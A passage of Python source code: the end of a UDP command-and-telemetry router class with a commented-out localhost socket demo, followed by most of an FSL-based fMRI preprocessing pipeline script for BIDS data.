logger.error("Error removing nonexitent telemetry source %d from cfs_cmd_source dictionary" % cmd_port)
self.tlm_dest_mutex.release()
self.tlm_dest_mutex.acquire()
self.tlm_dest_addr[tlm_port] = (self.gnd_ip_addr, tlm_port)
self.tlm_dest_mutex.release()
def run(self):
# COMMANDS
self.cfs_cmd_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# TELEMETRY
self.gnd_tlm_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.gnd_tlm_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.gnd_tlm_socket.bind(self.gnd_tlm_socket_addr)
self.gnd_tlm_socket.setblocking(False)
self.gnd_tlm_socket.settimeout(self.gnd_tlm_timeout)
self.gnd_tlm_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.gnd_tlm_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.gnd_tlm_socket.bind(self.gnd_tlm_socket_addr)
self.gnd_tlm_socket.setblocking(False)
self.gnd_tlm_socket.settimeout(self.gnd_tlm_timeout)
self.tlm_dest_connect.start()
try:
while self.enabled:
self.manage_routes()
except OSError:
# shutting down
pass
except Exception as e:
logger.error(f"CmdTlmRouter stopped due to error: {e}")
self.shutdown()
def manage_routes(self):
try:
while True:
datagram, host = self.gnd_tlm_socket.recvfrom(4096)
logger.debug(f"Received datagram: size={len(datagram)} {host}")
logger.debug(self.print_datagram(datagram))
self.gnd_tlm_queue.put((datagram, host))
self.tlm_dest_mutex.acquire()
for dest_addr in self.tlm_dest_addr:
self.tlm_dest_socket.sendto(datagram, self.tlm_dest_addr[dest_addr])
logger.debug("Sending tlm to destination " + str(dest_addr))
self.tlm_dest_mutex.release()
except socket.timeout:
pass
while not self.cfs_cmd_queue.empty():
datagram = self.cfs_cmd_queue.get()
self.cfs_cmd_socket.sendto(datagram, self.cfs_cmd_socket_addr)
logger.debug(self.print_datagram(datagram))
for cmd_source in self.cfs_cmd_source:
self.cfs_cmd_source[cmd_source].read_cmd_port(self.cfs_cmd_source_queue)
def tlm_dest_connect_thread(self):
logger.info("Starting tlm_dest_connect_thread")
while not self.tlm_dest_connect.kill:
datagram, host = self.tlm_dest_connect_socket.recvfrom(1024)
self.tlm_dest_mutex.acquire()
print("Accepted connection from " + str(host))
print("Datagram = ", datagram.decode().split(','))
dest_addr = datagram.decode().split(',')
self.tlm_dest_addr[int(dest_addr[1])] = (dest_addr[0],int(dest_addr[1]))
self.tlm_dest_mutex.release()
logger.info("Accepted connection from " + str(host))
def print_datagram(self, datagram):
output = []
for chunk in [datagram[i:i + 8] for i in range(0, len(datagram), 8)]:
output.append(" ".join([f"0x{byte:02X}" for byte in chunk]))
return "\n".join(output)
def shutdown(self):
logger.info("CmdTlm router shutdown")
self.enabled = False
self.tlm_dest_connect.kill = True
self.cfs_cmd_socket.close()
self.gnd_tlm_socket.close()
self.tlm_dest_socket.close()
self.tlm_dest_connect_socket.close()
###############################################################################
"""
import socket
import os
from _thread import *
ServerSideSocket = socket.socket()
host = '127.0.0.1'
port = 2004
ThreadCount = 0
try:
ServerSideSocket.bind((host, port))
except socket.error as e:
print(str(e))
print('Socket is listening..')
ServerSideSocket.listen(5)
def multi_threaded_client(connection):
connection.send(str.encode('Server is working:'))
while True:
data = connection.recv(2048)
response = 'Server message: ' + data.decode('utf-8')
if not data:
break
connection.sendall(str.encode(response))
connection.close()
while True:
Client, address = ServerSideSocket.accept()
print('Connected to: ' + address[0] + ':' + str(address[1]))
start_new_thread(multi_threaded_client, (Client, ))
ThreadCount += 1
print('Thread Number: ' + str(ThreadCount))
ServerSideSocket.close()
import socket
ClientMultiSocket = socket.socket()
host = '127.0.0.1'
port = 2004
print('Waiting for connection response')
try:
ClientMultiSocket.connect((host, port))
except socket.error as e:
print(str(e))
res = ClientMultiSocket.recv(1024)
while True:
Input = input('Hey there: ')
ClientMultiSocket.send(str.encode(Input))
res = ClientMultiSocket.recv(1024)
print(res.decode('utf-8'))
ClientMultiSocket.close()
"""
|
fmripreproc_wrapper.py
|
#! usr/bin/env python
# ## PIPELINE: fmripreproc_wrapper.py
# ## USAGE: python3 fmripreproc_wrapper --in=<inputs> --out=<outputs> [OPTIONS]
# * requires python3 and FSL (calls FSL via python subprocess)
#
# ## Author(s)
#
# * Amy K. Hegarty, Intermountain Neuroimaging Consortium, University of Colorado Boulder
# * University of Colorado Boulder
#
# ## Product
#
# FSL Pipelines
#
# ## License
#
# <!-- References -->
# [FSL]: https://fsl.fmrib.ox.ac.uk/fsl/fslwiki
# [pybids]: Yarkoni et al., (2019). PyBIDS: Python tools for BIDS datasets. Journal of Open Source Software, 4(40), 1294, https://doi.org/10.21105/joss.01294
# Yarkoni, Tal, Markiewicz, Christopher J., de la Vega, Alejandro, Gorgolewski, Krzysztof J., Halchenko, Yaroslav O., Salo, Taylor, ? Blair, Ross. (2019, August 8). bids-standard/pybids: 0.9.3 (Version 0.9.3). Zenodo. http://doi.org/10.5281/zenodo.3363985
#
# ------------------------------------------------------------------------------
# Show usage information for this script
# ------------------------------------------------------------------------------
def print_help():
print("""
fMRI Preprocessing Pipeline
Usage: """ + """ --in=<bids-inputs> --out=<outputs> --participant-label=<id> [OPTIONS]
OPTIONS
--help show this usage information and exit
--participant-label= participant name for processing (pass only 1)
--work-dir= (Default: <outputs>/scratch/particiant-label) directory
path for working directory
--clean-work-dir= (Default: TRUE) clean working directory
--run-qc add flag to run automated quality
control for preprocessing
--run-aroma add flag to run aroma noise removal on
preprocessed images
--run-fix (?) add flag to run fsl-fix noise removal on
preprocessed images
** OpenMP used for parellelized execution of XXX. Multiple cores (CPUs)
are recommended (XX cpus for each fmri scan).
** see github repository for more information and to report issues:
https://github.com/intermountainneuroimaging/fmri-preproc.git
""")
# ------------------------------------------------------------------------------
# Parse arguements for this script
# ------------------------------------------------------------------------------
def parse_arguments(argv):
import os
import sys
import getopt
#intialize arguements
print("\nParsing User Inputs...")
qc = False
cleandir = False
runaroma = False
runfix = False
overwrite=False
try:
opts, args = getopt.getopt(argv,"hi:o:",["in=","out=","help","participant-label=","work-dir=","clean-work-dir=","run-qc","run-aroma","run-fix"])
except getopt.GetoptError:
print_help()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
print_help()
sys.exit()
elif opt in ("-i", "--in"):
inputs = arg
if not os.path.exists(inputs):
raise Exception("BIDS directory does not exist")
elif opt in ("-o", "--out"):
outputs = arg
elif opt in ("--participant-label"):
pid = arg
elif opt in ("--work-dir"):
wd = arg
elif opt in ("--clean-work-dir"):
cleandir = arg
elif opt in ("--run-qc"):
qc=True
elif opt in ("--run-aroma"):
runaroma = True
elif opt in ("--run-fix"):
runfix = True
if 'inputs' not in locals():
print_help()
raise Exception("Missing required argument --in=")
sys.exit()
if 'outputs' not in locals():
print_help()
raise Exception("Missing required argument --out=")
sys.exit()
if 'pid' not in locals():
print_help()
raise Exception("Missing required argument --participant-label=")
sys.exit()
if not "wd" in locals():
wd=outputs + "/fmripreproc/scratch/sub-" + pid
print('Input Bids directory:\t', inputs)
print('Derivatives path:\t', outputs+'fmripreproc')
print('Working directory:\t',wd)
print('Participant:\t\t', str(pid))
class args:
def __init__(self, wd, inputs, outputs, pid, qc, cleandir, runaroma, runfix):
self.wd = wd
self.inputs = inputs
self.outputs = outputs
self.pid = pid
self.runQC=qc
self.cleandir=cleandir
self.runaroma=runaroma
self.runfix=runfix
scriptsdir=os.path.dirname(os.path.realpath(__file__))
self.templates=scriptsdir+'/fmripreproc_code'
self.overwrite=False
entry = args(wd, inputs, outputs, pid, qc, cleandir, runaroma, runfix)
return entry
# ------------------------------------------------------------------------------
# Parse Bids inputs for this script
# ------------------------------------------------------------------------------
def bids_data(entry):
import os
import glob
import bids
import json
bids.config.set_option('extension_initial_dot', True)
layout = bids.BIDSLayout(entry.inputs, derivatives=False, absolute_paths=True)
if not os.path.exists(entry.outputs + '/fmripreproc') or os.path.exists(entry.outputs + '/fmripreproc/' + 'dataset_description.json'):
os.makedirs(entry.outputs,mode=511,exist_ok=True)
os.makedirs(entry.outputs + '/fmripreproc', mode=511,exist_ok=True)
# make dataset_description file...
import json
data = {
'Name': 'FSL fMRI Minimal Preprocessing',
"BIDSVersion": "1.1.1",
"PipelineDescription": {
"Name": "FSL fMRI Minimal Preprocessing",
"Version": "0.0.1",
"CodeURL": "..."
},
"CodeURL": "https://github.com/intermountainneuroimaging/fmri-preproc.git",
"HowToAcknowledge": "Please cite all relevant works for FSL tools: bet, topup, mcflirt, aroma and python tools: pybids ( https://doi.org/10.21105/joss.01294, https://doi.org/10.21105/joss.01294)"}
with open(entry.outputs + '/fmripreproc/' + 'dataset_description.json', 'w') as outfile:
json.dump(data, outfile, indent=2)
return layout
# ------------------------------------------------------------------------------
# Main Pipeline Starts Here...
# ------------------------------------------------------------------------------
def worker(name,cmdfile):
"""Executes the bash script"""
import subprocess
from subprocess import PIPE
process = subprocess.Popen(cmdfile.split(), stdout=PIPE, stderr=PIPE, universal_newlines=True)
output, error = process.communicate()
print(error)
print('Worker: ' + name + ' finished')
return
def writelist(filename,outlist):
textfile = open(filename, "w")
for element in outlist:
textfile.write(element + "\n")
textfile.close()
def checkfile_string(filename,txt):
with open(filename) as temp_f:
datafile = temp_f.readlines()
for line in datafile:
if txt in line:
return True # The string is found
return False # The string does not exist in the file
def run_bet(layout,entry):
import os
import sys
import subprocess
import multiprocessing
returnflag=False
# check if output exists already
if os.path.exists(entry.wd + '/bet/t1bet/struc_acpc_brain.nii.gz') and not entry.overwrite:
print('Brain Extraction output exists...skipping')
else: # Run BET
print("\nRunning BET...\n")
t1w=layout.get(subject=entry.pid, extension='nii.gz', suffix='T1w')
t1w=t1w[0]
imgpath = t1w.path
imgname = t1w.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# -------- run command -------- #
cmd = "bash " + entry.templates + "/run_bet.sh " + imgpath + " " + entry.wd
name = "bet"
p = multiprocessing.Process(target=worker, args=(name,cmd))
p.start()
print(p)
returnflag=True
p.join() # blocks further execution until job is finished
return returnflag
def save_bet(layout,entry):
import os
import sys
t1w=layout.get(subject=entry.pid, extension='nii.gz', suffix='T1w')
imgpath=t1w[0].path
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Add additional info to output file entities
ent['type'] = 'anat'
ent['space'] = 'T1w'
ent['desc'] = 'brain'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
ent['desc'] = 'brain'
ent['suffix'] = 'mask'
outmask = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
ent['desc'] = 'head'
ent['suffix'] = 'T1w'
outhead = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
os.system('cp -p ' + entry.wd + '/bet/t1bet/struc_acpc_brain.nii.gz ' + entry.outputs + "/" + outfile)
os.system('cp -p ' + entry.wd + '/bet/t1bet/struc_acpc_brain_mask.nii.gz ' + entry.outputs + "/" + outmask)
os.system('cp -p ' + entry.wd + '/bet/t1bet/struc_acpc.nii.gz ' + entry.outputs + "/" + outhead)
## end run_bet
def run_topup(layout,entry):
import os
import sys
import subprocess
import multiprocessing
import numpy as np
import re
# check for number of feildmap pairs
fmapfiles=layout.get(subject=entry.pid, extension='nii.gz', suffix='epi');
jobs=[]
returnflag=False
if np.remainder(len(fmapfiles), 2) != 0:
raise Exception("Topup cannot be run...unbalanced Fieldmap pairs")
npairs = int(len(fmapfiles)/2)
print(fmapfiles)
fmapfilenames = [item.path for item in fmapfiles]
for r in range(1,npairs+1):
run=str(r).zfill(2)
fmappair = [x for x in fmapfilenames if 'run-'+run in x]
if not fmappair:
fmappair = fmapfilenames
# check if output exists already
if os.path.exists(entry.wd + '/topup-'+run+'/topup4_field_APPA.nii.gz') and not entry.overwrite:
print('Topup-' + run + ' output exists...skipping')
continue
print(" ")
# Run Topup
print("\nRunning Topup...\n")
# check two fieldmaps collected with opposing phase encoding directions
ap=False ; pa=False
for fmap in fmappair:
img = layout.get_file(fmap)
ent = img.get_entities()
if 'AP' in ent['direction']:
ap=True; img1=img.path ; meta=img.get_metadata()
elif 'PA' in ent['direction']:
pa=True ; img2=img.path
if not ap and not pa:
# continue topup... (else throw error?)
raise Exception("Topup cannot be run...Missing AP or PA fieldmaps")
# add notes on intended in working dir
os.makedirs(entry.wd + '/topup-'+run,exist_ok=True)
writelist(entry.wd + '/topup-'+run+'/intendedfor.list', meta['IntendedFor'])
# run script
cmd = "bash " + entry.templates + "/run_topup.sh " + img1 + " " + img2 + " " + entry.wd+'/topup-'+run + " " + str(meta['TotalReadoutTime'])
name = "topup"+run
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
print(p)
returnflag=True
for job in jobs:
job.join() #wait for all topup commands to finish
return returnflag
## end run_topup
def run_distcorrepi(layout,entry):
import os
import sys
import subprocess
import multiprocessing
import glob
itr=0;
nfiles = len(layout.get(subject=entry.pid, extension='nii.gz', suffix='bold'))
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, extension='nii.gz', suffix=['bold','sbref']):
imgpath = func.path
imgname = func.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# get file metadata
meta=func.get_metadata()
aqdir=meta['PhaseEncodingDirection']
if os.path.exists(entry.wd + '/distcorrepi/' + 'dc_' + imgname) and not entry.overwrite:
itr=itr+1
print("Distortion correction output exists...skipping: " + imgname)
continue
print(" ")
# ------- Running distortion correction ------- #
# select topup file based on aquistion direction
if aqdir == "j-":
param = "acqparams_AP.txt"
fout = "topup4_field_APPA"
elif aqdir == "j":
param = "acqparams_PA.txt"
fout = "topup4_field_PAAP"
s=', '
print('Using: ' + imgpath)
print('Using: ' + param)
print('Using: ' + fout)
print("distortion corrected image: " + 'dc_' + imgname)
# select correct topup directory
topupdir=[]
for ff in glob.iglob(entry.wd + '/topup-*/intendedfor.list'):
if checkfile_string(ff,imgname):
s='/'
topupdir = ff.split('/')[-2]
if not topupdir:
raise Exception("Cannot identify fieldmap intended for distortion correction:" +imgname)
# -------- run command -------- #
cmd = "bash " + entry.templates + "/run_distcorrepi.sh " + imgpath + " " + fout + " " + param + " " + topupdir + " " + entry.wd
print(cmd)
print(" ")
name = "distcorr-" + ent['task'] + str(ent['run']) + "-" + ent['suffix']
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
itr = itr+1
print(p)
returnflag=True
for job in jobs:
job.join() #wait for all distcorrepi commands to finish
return returnflag
## end run_discorrpei
def run_preprocess(layout,entry):
import os
import sys
import subprocess
import multiprocessing
itr=0;
nfiles = len(layout.get(subject=entry.pid, extension='nii.gz', suffix='bold'))
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, extension='nii.gz', suffix='bold'):
imgpath = func.path
imgname = func.filename
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
if os.path.exists(entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_mcf.nii.gz') and not entry.overwrite:
itr=itr+1
print("Motion correction output exists...skipping: " + imgname)
continue
print(" ")
# ------- Running preprocessing: motion correction + trimming ------- #
s=', '
print('Using: ' + imgpath)
# -------- run command -------- #
entry.trimvols=10; # make input!!
cmd = "bash " + entry.templates + "/run_preprocess.sh " + imgpath + " " + ent['task'] + str(ent['run']) + " " + entry.wd + " " + str(entry.trimvols)
print(cmd)
print(" ")
name = "preproc-" + ent['task'] + str(ent['run'])
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
itr = itr+1
print(p)
returnflag=True
for job in jobs:
job.join() # wait for all preproc commands to finish
return returnflag
## end run_preprocess
def save_preprocess(layout,entry):
import os
import sys
# Move output files to permanent location
for func in layout.get(subject=entry.pid, extension='nii.gz', suffix='bold'):
imgpath = func.path
imgname = func.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Add additional info to output file entities
ent['type'] = 'func'
ent['space'] = 'native'
ent['desc'] = 'preproc'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
# Add additional info to output file entities
ent['space'] = 'native'
ent['desc'] = 'preproc'
ent['suffix'] = 'sbref'
outfile_sbref = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
print("Motion corrected image: " + outfile)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
os.system('cp -p ' + entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_mcf.nii.gz ' + entry.outputs + "/" + outfile)
if os.path.exists(entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_SBRef_bet.nii.gz'):
os.system('cp -p ' + entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_SBRef_bet.nii.gz ' + entry.outputs + "/" + outfile_sbref)
else:
os.system('cp -p ' + entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_meanvol_bet.nii.gz ' + entry.outputs + "/" + outfile_sbref)
## END SAVE_PREPROCESS
def run_registration(layout,entry):
import os
import sys
import subprocess
import multiprocessing
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
t1w = layout.get(subject=entry.pid, desc='brain', extension='nii.gz', suffix='T1w')
t1wpath = t1w[0].path
t1whead = layout.get(subject=entry.pid, desc='head', extension='nii.gz', suffix='T1w')
t1wheadpath = t1whead[0].path
if os.path.exists(entry.wd + '/reg/' + ent['task'] + str(ent['run']) +'/' + 'func_data2standard.nii.gz') and not entry.overwrite:
print("Registration complete...skipping: " + imgname)
continue
print(" ")
# ------- Running registration: T1w space and MNI152Nonlin2006 (FSLstandard) ------- #
s=', '
print('Registering: ' + imgpath)
print('Using: ' + t1wpath)
# -------- run command -------- #
stdpath = os.popen('echo $FSLDIR/data/standard/MNI152_T1_2mm_brain.nii.gz').read().rstrip()
cmd = "bash " + entry.templates + "/run_registration.sh " + imgpath + " " + t1wheadpath + " " + t1wpath + " " + stdpath + " " + entry.wd
name = "registration-" + ent['task'] + str(ent['run']) + "-" + ent['suffix']
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
print(p)
returnflag=True
for job in jobs:
job.join() # wait for all preproc commands to finish
return returnflag
## end run_registration
def save_registration(layout,entry):
import os
import sys
# move outputs to permanent location...
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Add additional info to output file entities
ent['type'] = 'func'
ent['space'] = 'MNI152Nonlin2006'
ent['desc'] = 'preproc'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
ent['suffix'] = 'sbref'
outfile_sbref = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_desc-{desc}]_{suffix}/",
ent['type'] = 'func'
ent['desc'] = []
ent['suffix'] = 'reg'
outdir_reg = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
print("Registered image: " + outfile)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
os.system('cp -p ' + entry.wd + '/reg/' + ent['task'] + str(ent['run']) + '/' + 'func_data2standard.nii.gz ' + entry.outputs + '/' + outfile)
os.system('cp -p ' + entry.wd + '/reg/' + ent['task'] + str(ent['run']) + '/' + 'example_func2standard.nii.gz ' + entry.outputs + '/' + outfile_sbref)
# copy registration matricies
os.system('mkdir -p ' + entry.outputs + '/' + outdir_reg)
os.system('cp -p ' + entry.wd + '/reg/' + ent['task'] + str(ent['run']) + '/' + '*.mat ' + entry.outputs + '/' + outdir_reg)
# move t1w images...
t1w = layout.get(subject=entry.pid, desc='brain', extension='nii.gz', suffix='T1w')
t1wpath = t1w[0].path
# output filename...
entfunc = layout.parse_file_entities(imgpath) # save from above
ent = layout.parse_file_entities(t1wpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Add additional info to output file entities
ent['type'] = 'anat'
ent['space'] = 'MNI152Nonlin2006'
ent['desc'] = 'brain'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
ent['suffix'] = 'mask'
maskfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
print("Registered image: " + outfile)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
os.system('cp -p ' + entry.wd + '/reg/' + entfunc['task'] + str(entfunc['run']) + '/' + 'highres2standard.nii.gz ' + entry.outputs + outfile)
os.system('cp -p ' + entry.wd + '/reg/' + entfunc['task'] + str(entfunc['run']) + '/' + 'mask2standard.nii.gz ' + entry.outputs + maskfile)
## END SAVE_REGISTRATION
def run_snr(layout,entry):
import os
import sys
import subprocess
import multiprocessing
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
t1w = layout.get(subject=entry.pid, space='T1w', desc='brain', extension='nii.gz', suffix='T1w')
t1wpath = t1w[0].path
if os.path.exists(entry.wd + '/snr/' + ent['task'] + str(ent['run']) +'/snr_calc/' + ent['task'] + '/' + 'snr.nii.gz') and not entry.overwrite:
print("SNR complete...skipping: " + imgname)
continue
print(" ")
# ------- Running registration: T1w space and MNI152Nonlin2006 (FSLstandard) ------- #
s=', '
print('Calculating SNR: ' + imgpath)
# -------- run command -------- #
cmd = "bash " + entry.templates + "/run_snr.sh " + imgpath + " " + t1wpath + " " + entry.wd
name = "snr-" + ent['task'] + str(ent['run']) + "-" + ent['suffix']
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
print(p)
returnflag=True
for job in jobs:
job.join() # wait for all preproc commands to finish
return returnflag
## end run_snr
def save_snr(layout,entry):
import os
import sys
# move outputs to permanent location...
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Add additional info to output file entities
ent['type'] = 'func'
ent['space'] = 'MNI152Nonlin2006'
ent['desc'] = 'preproc'
ent['suffix'] = 'snr'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
print("SNR image: " + outfile)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
os.system('cp -p ' + entry.wd + '/snr/' + ent['task'] + str(ent['run']) +'/snr_calc/' + ent['task'] + '/' + 'snr.nii.gz ' + entry.outputs + '/' + outfile)
# --------------------- complete -------------------------- #
def run_outliers(layout,entry):
import os
import sys
import subprocess
import multiprocessing
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# run from preproc images...
img1=ent['task'] + str(ent['run'])+".nii.gz"
img2=ent['task'] + str(ent['run'])+"_mcf.nii.gz"
path=entry.wd + '/preproc/'
if os.path.exists(entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_fd_outliers.tsv') and not entry.overwrite:
print("Outlier Detection complete...skipping: " + ent['task'] + str(ent['run']))
continue
print(" ")
# ------- Running registration: T1w space and MNI152Nonlin2006 (FSLstandard) ------- #
s=', '
print('Calculating Outliers: ' + imgpath)
# -------- run command -------- #
cmd = "bash " + entry.templates + "/run_outliers.sh " + path+img1 + " " + path+img2 + " " + entry.wd
name = "outlier-" + ent['task'] + str(ent['run']) + "-" + ent['suffix']
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
print(p)
returnflag=True
for job in jobs:
job.join() # wait for all preproc commands to finish
return returnflag
## end run_outliers
def save_outliers(layout,entry):
import os
import sys
# move outputs to permanent location...
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# compile all outputs to single confounds file
workingpath=entry.wd + '/preproc/'
generate_confounds_file(workingpath,ent['task'] + str(ent['run']))
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.tsv",
# Add additional info to output file entities
ent['type'] = 'func'
ent['space'] = []
ent['desc'] = 'preproc'
ent['suffix'] = 'confounds'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
print("Outliers file: " + outfile)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
os.system('cp -p ' + entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_confounds.tsv ' + entry.outputs + '/' + outfile)
#save_outliers
def run_fast(layout,entry):
import os
import sys
import subprocess
import multiprocessing
returnflag=False
# check if output exists already
if os.path.exists(entry.wd + '/segment/t1w_brain_seg.nii.gz') and not entry.overwrite:
print('Tissue Segmentation output exists...skipping')
else: # Run BET
print("\nRunning FAST...\n")
t1w=layout.get(subject=entry.pid, extension='nii.gz', suffix='T1w')
t1w=t1w[0]
imgpath = t1w.path
imgname = t1w.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# -------- run command -------- #
cmd = "bash " + entry.templates + "/run_fast.sh " + imgpath + " " + entry.wd
name = "fast"
p = multiprocessing.Process(target=worker, args=(name,cmd))
p.start()
print(p)
returnflag=True
p.join() # blocks further execution until job is finished
return returnflag
def save_fast(layout,entry):
import os
import sys
t1w=layout.get(subject=entry.pid, extension='nii.gz', suffix='T1w')
imgpath=t1w[0].path
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz"
# Add additional info to output file entities
ent['type'] = 'anat'
ent['space'] = 'T1w'
ent['desc'] = 'whitematter'
ent['suffix'] = 'mask'
out_wm_mask = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
ent['desc'] = 'greymatter'
out_gm_mask = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
ent['desc'] = 'csf'
out_csf_mask = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + out_wm_mask + ')')
os.system('cp -p ' + entry.wd + '/segment/t1w_brain_seg_0.nii.gz ' + entry.outputs + "/" + out_csf_mask)
os.system('cp -p ' + entry.wd + '/segment/t1w_brain_seg_1.nii.gz ' + entry.outputs + "/" + out_gm_mask)
os.system('cp -p ' + entry.wd + '/segment/t1w_brain_seg_2.nii.gz ' + entry.outputs + "/" + out_wm_mask)
## end save_fast
def run_aroma_icamodel(layout,entry):
import os
import sys
import subprocess
import multiprocessing
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
